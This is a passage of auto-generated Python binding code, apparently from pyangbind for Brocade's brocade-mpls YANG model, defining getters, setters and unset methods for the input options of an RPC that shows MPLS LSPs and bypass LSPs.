self.__lsp_input_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-extensive", rest_name="lsp-input-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-debug", rest_name="bypass-lsp-dynamic-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic", rest_name="bypass-lsp-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-detail", rest_name="bypass-lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-extensive", rest_name="lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_dynamic = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-dynamic", rest_name="lsp-input-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-debug", rest_name="bypass-lsp-static-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_one = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-one", rest_name="lsp-input-one", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_all = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-all", rest_name="lsp-input-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-debug", rest_name="bypass-lsp-static-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-wide", rest_name="bypass-lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_brief = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-brief", rest_name="lsp-input-brief", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_bypass = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-bypass", rest_name="lsp-input-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-extensive", rest_name="bypass-lsp-dynamic-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-debug", rest_name="bypass-lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_mpls_rpc', u'show-mpls-lsp-name-debug', u'input', u'show-lsp-input-info']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'show-mpls-lsp-name-debug', u'input']
def _get_lsp(self):
"""
Getter method for lsp, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp (string)
YANG Description: Show all lsps in brief
"""
return self.__lsp
def _set_lsp(self, v, load=False):
"""
Setter method for lsp, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp() directly.
YANG Description: Show all lsps in brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp", rest_name="lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp", rest_name="lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp(self):
self.__lsp = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp", rest_name="lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_wide(self):
"""
Getter method for lsp_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_wide (boolean)
YANG Description: Show all lsps in brief and wide
"""
return self.__lsp_wide
def _set_lsp_wide(self, v, load=False):
"""
Setter method for lsp_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_wide is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_wide() directly.
YANG Description: Show all lsps in brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-wide", rest_name="lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-wide", rest_name="lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_wide(self):
self.__lsp_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-wide", rest_name="lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_detail(self):
"""
Getter method for lsp_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_detail (boolean)
YANG Description: Show all lsps in detail
"""
return self.__lsp_detail
def _set_lsp_detail(self, v, load=False):
"""
Setter method for lsp_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_detail is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_detail() directly.
YANG Description: Show all lsps in detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-detail", rest_name="lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-detail", rest_name="lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_detail(self):
self.__lsp_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-detail", rest_name="lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_extensive(self):
"""
Getter method for lsp_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_extensive (boolean)
YANG Description: Show all lsps in extensive
"""
return self.__lsp_extensive
def _set_lsp_extensive(self, v, load=False):
"""
Setter method for lsp_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_extensive() directly.
YANG Description: Show all lsps in extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-extensive", rest_name="lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-extensive", rest_name="lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_extensive(self):
self.__lsp_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-extensive", rest_name="lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_debug(self):
"""
Getter method for lsp_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_debug (boolean)
YANG Description: Show all lsps in extensive debug
"""
return self.__lsp_debug
def _set_lsp_debug(self, v, load=False):
"""
Setter method for lsp_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_debug() directly.
YANG Description: Show all lsps in extensive debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-debug", rest_name="lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-debug", rest_name="lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_debug(self):
self.__lsp_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-debug", rest_name="lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_name(self):
"""
Getter method for lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name (string)
YANG Description: Show one lsp detailed info by name
"""
return self.__lsp_name
def _set_lsp_name(self, v, load=False):
"""
Setter method for lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_name() directly.
YANG Description: Show one lsp detailed info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name(self):
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_name_extensive(self):
"""
Getter method for lsp_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name_extensive (boolean)
YANG Description: Show one lsp extensive info by name
"""
return self.__lsp_name_extensive
def _set_lsp_name_extensive(self, v, load=False):
"""
Setter method for lsp_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_name_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_name_extensive() directly.
YANG Description: Show one lsp extensive info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-name-extensive", rest_name="lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-extensive", rest_name="lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_name_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name_extensive(self):
self.__lsp_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-extensive", rest_name="lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_name_debug(self):
"""
Getter method for lsp_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name_debug (boolean)
YANG Description: Show one lsp extensive debug info by name
"""
return self.__lsp_name_debug
def _set_lsp_name_debug(self, v, load=False):
"""
Setter method for lsp_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_name_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_name_debug() directly.
YANG Description: Show one lsp extensive debug info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-name-debug", rest_name="lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-debug", rest_name="lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_name_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name_debug(self):
self.__lsp_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-debug", rest_name="lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp(self):
"""
Getter method for bypass_lsp, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp (string)
YANG Description: Show all bypass-lsps in brief
"""
return self.__bypass_lsp
def _set_bypass_lsp(self, v, load=False):
"""
Setter method for bypass_lsp, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp() directly.
YANG Description: Show all bypass-lsps in brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp", rest_name="bypass-lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp", rest_name="bypass-lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp(self):
self.__bypass_lsp = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp", rest_name="bypass-lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_wide(self):
"""
Getter method for bypass_lsp_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_wide (boolean)
YANG Description: Show all bypass-lsps in brief and wide
"""
return self.__bypass_lsp_wide
def _set_bypass_lsp_wide(self, v, load=False):
"""
Setter method for bypass_lsp_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_wide is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_wide() directly.
YANG Description: Show all bypass-lsps in brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-wide", rest_name="bypass-lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-wide", rest_name="bypass-lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_wide(self):
self.__bypass_lsp_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-wide", rest_name="bypass-lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_detail(self):
"""
Getter method for bypass_lsp_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_detail (boolean)
YANG Description: Show all bypass-lsps in detail
"""
return self.__bypass_lsp_detail
def _set_bypass_lsp_detail(self, v, load=False):
"""
Setter method for bypass_lsp_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_detail is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_detail() directly.
YANG Description: Show all bypass-lsps in detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-detail", rest_name="bypass-lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-detail", rest_name="bypass-lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_detail(self):
self.__bypass_lsp_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-detail", rest_name="bypass-lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_extensive(self):
"""
Getter method for bypass_lsp_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_extensive (boolean)
YANG Description: Show all bypass-lsps in extensive
"""
return self.__bypass_lsp_extensive
def _set_bypass_lsp_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_extensive() directly.
YANG Description: Show all bypass-lsps in extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-extensive", rest_name="bypass-lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-extensive", rest_name="bypass-lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_extensive(self):
self.__bypass_lsp_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-extensive", rest_name="bypass-lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_debug(self):
"""
Getter method for bypass_lsp_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_debug (boolean)
YANG Description: Show all bypass-lsps in extensive debug
"""
return self.__bypass_lsp_debug
def _set_bypass_lsp_debug(self, v, load=False):
"""
Setter method for bypass_lsp_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_debug() directly.
YANG Description: Show all bypass-lsps in extensive debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-debug", rest_name="bypass-lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-debug", rest_name="bypass-lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_debug(self):
self.__bypass_lsp_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-debug", rest_name="bypass-lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_name(self):
"""
Getter method for bypass_lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name (string)
YANG Description: Show one bypass-lsp detailed info by name
"""
return self.__bypass_lsp_name
def _set_bypass_lsp_name(self, v, load=False):
"""
